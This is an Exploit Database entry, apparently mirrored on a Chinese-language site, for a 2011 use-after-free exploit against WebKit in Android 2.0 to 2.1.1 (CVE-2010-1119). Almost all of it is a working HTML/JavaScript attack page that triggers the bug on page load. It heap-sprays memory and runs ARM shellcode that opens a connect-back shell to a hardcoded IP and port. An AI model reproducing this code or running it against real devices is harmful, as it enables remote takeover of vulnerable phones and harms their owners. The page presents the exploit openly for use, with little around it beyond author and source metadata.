Google Android 2.0/2.1/2.1.1 – WebKit Use-After-Free

• Exploit Database
• 98 阅读

• 作者： MJ Keith
  日期： 2011-03-14
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/16974/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

  <html> <!-- # Exploit Title: android exploit for 2010-1119 use after free # Date: 2011/03/11 # Author: MJ Keith # Software Link: http://www.android.com/ # Version: 2.0 ,2.1 , 2.1.1 # Tested on: Android # CVE : 2010-1119   This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides email: mkeith AT exploitscience.org -->   <head> <script language="JavaScript"> function heap() {   var id = document.getElementById("target"); var attribute = id.getAttributeNode(&apos;id&apos;); nodes = attribute.childNodes; document.body.removeChild(id); attribute.removeChild(nodes[0]); setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };     var scode = unescape("\u0060\u0060"); var scode2 = unescape("\u5005\ue1a0"); var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\ \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002"); shell += unescape("\uae08"); // Port = 2222 shell += unescape("\u000a\u0202"); // IP = 10.0.2.2 shell += unescape("\u2000\u2000"); // string terminate   do { scode += scode; scode2 += scode2;   } while (scode.length<=0x1000); scode2 += shell   target = new Array(); for(i = 0; i < 300; i++){   if (i<130){ target[i] = scode;} if (i>130){ target[i] = scode2;}   document.write(target[i]); document.write("<br />"); if (i>250){ //alert("freeze"); nodes[0].textContent}   }   }, 0); } </script> </head> <body onload=heap()> <p id=target></p> </body> </html>